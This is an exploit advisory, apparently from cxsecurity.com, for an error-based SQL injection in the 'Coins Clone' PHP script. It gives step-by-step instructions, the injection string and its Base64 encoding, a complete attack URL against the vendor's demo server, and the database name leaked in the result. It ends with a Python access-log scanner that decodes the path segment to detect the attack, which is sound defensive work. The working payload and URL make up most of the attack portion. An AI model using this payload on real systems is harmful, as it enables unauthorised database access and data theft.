Coins Clone - PHP Script SQL Injection

2020.04.19
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Coins Clone - PHP Script SQL Injection
# Date: 2020-04-16
# Exploit Author: UltraSecurityTeam
# Team Member = Ashkan Moghaddas , AmirMohammad Safari , Behzad khalifeh
# Vendor Homepage: https://www.coinsclone.com/
# Version: All Version
# Tested on: ubuntu
# Special Thanks : Meisam Monsef (@meisamrce)

Exploit:

1 - Log in or create an account.

2 - Convert your SQL injection command to Base64.

    My injection command:
    23 and extractvalue(1,concat(0x3a,database(),0x3a))

    Base64-encoded:
    MjMgYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDNhLGRhdGFiYXNlKCksMHgzYSkp

3 - Go to this page and inject:

    https://demo2.coinsclone.com/traderprofile/[base64 SQL Injection]
    https://demo2.coinsclone.com/traderprofile/MjMgYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDNhLGRhdGFiYXNlKCksMHgzYSkp

4 - Result:

    XPATH syntax error: ':demo2coi_dmusrlcb:'
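Because the injected text travels Base64-encoded in the `traderprofile` path segment, plain-text SQL signatures in logs or a WAF never see it. The following is an added example, not code from the advisory or the vendor: it decodes that segment from access-log lines and flags any request whose decoded value is not a bare numeric id. The log format, the sample lines, the function names and the rule that a legitimate segment decodes to a decimal id are assumptions.

```python
import base64
import binascii
import re
from urllib.parse import unquote

# Path shape from the advisory: /traderprofile/<Base64 segment>
PROFILE_RE = re.compile(r'"(?:GET|POST) /traderprofile/([^ ?"/]+)')

def decode_segment(segment):
    """Strictly Base64-decode a path segment; return bytes, or None if malformed."""
    seg = unquote(segment)
    seg += "=" * (-len(seg) % 4)  # tolerate stripped padding
    try:
        return base64.b64decode(seg, validate=True)
    except (binascii.Error, ValueError):
        return None

def profile_id(segment):
    """Return the integer id in a segment, or None for anything else.
    Assumption: a legitimate segment is Base64 of a short decimal id only."""
    raw = decode_segment(segment)
    if raw is None or not re.fullmatch(rb"[0-9]{1,10}", raw):
        return None
    return int(raw)

def suspicious_requests(log_lines):
    """Return (client_ip, decoded_text) for traderprofile hits that are not a bare id."""
    hits = []
    for line in log_lines:
        m = PROFILE_RE.search(line)
        if m and profile_id(m.group(1)) is None:
            raw = decode_segment(m.group(1))
            text = raw.decode("latin-1") if raw is not None else "<not base64>"
            hits.append((line.split(" ", 1)[0], text))
    return hits

# Constructed access-log lines (documentation IPs); the second carries the advisory's segment.
SAMPLE_LOG = [
    '203.0.113.5 - - [16/Apr/2020:10:00:01 +0000] "GET /traderprofile/MjM= HTTP/1.1" 200 5120',
    '203.0.113.9 - - [16/Apr/2020:10:00:07 +0000] "GET /traderprofile/'
    'MjMgYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDNhLGRhdGFiYXNlKCksMHgzYSkp HTTP/1.1" 200 734',
    '203.0.113.5 - - [16/Apr/2020:10:00:09 +0000] "GET /index.php HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, text in suspicious_requests(SAMPLE_LOG):
        print(f"{ip}: {text}")
```

The same `profile_id` check, applied server-side before the value reaches a parameterized query, rejects the request instead of only reporting it.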



Copyright 2020, cxsecurity.com